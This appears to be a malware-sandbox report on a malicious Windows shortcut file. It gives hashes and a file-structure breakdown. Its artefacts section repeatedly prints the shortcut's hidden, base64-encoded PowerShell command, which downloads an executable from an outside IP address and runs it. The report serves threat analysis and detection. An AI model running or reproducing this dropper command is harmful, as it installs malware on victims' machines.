Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
75190ef5e0170e4a79061cf9ec8eb169
Sha1
b053c3084900c433606d303d27aa2cc3043a5d63
Sha256
352241ec9505c1272f5ad3f2b9891d8f4552d41b968ebacdb619ab5fd7a80cc6
Sha384
2c4af91d0e77ac9a9377e6af427617067eec9ef52d90c190ec0ccdb86671a5d15ac4186f0fa401f7f1e73758afeaaac8
Sha512
a2e817f9d31a8e0dd5a697ea3093f51ded23c375818629bfebfb7e0b79fc7ef32c7068ba5da371b1ce83fc5f3524fd3f36653274f661b8f8c441b03d5f05ad43
SSDeep
24:9lIbwff+qb1o85/1vQTL+5+jAtrsPajOkibhLioccEZCSpThvc8TC0FSnT0bwffj:9lIUnRlaqroP1kiNryZCy3T7SnT0UnE2
TLSH
2731C96E5651C367C8E62A707BD433071D823522C6B89AFA165C7A902CCB39E79E0428
File Structure
75190ef5e0170e4a79061cf9ec8eb169
Malicious
oustanding!$&()blance500%&00$&09finalrevised.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw==')));
Deobfuscated PowerShell

-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw==")))
Deobfuscated PowerShell

-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw==")))
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw==")))
Deobfuscated PowerShell

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xOTIuMjEwLjIzNi4xNzUvcHJlYWNjZXB0cy5leGUnLCAkcGF0aCk7IHN0YXJ0ICRwYXRoOw==")))
75190ef5e0170e4a79061cf9ec8eb169 (1.49 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙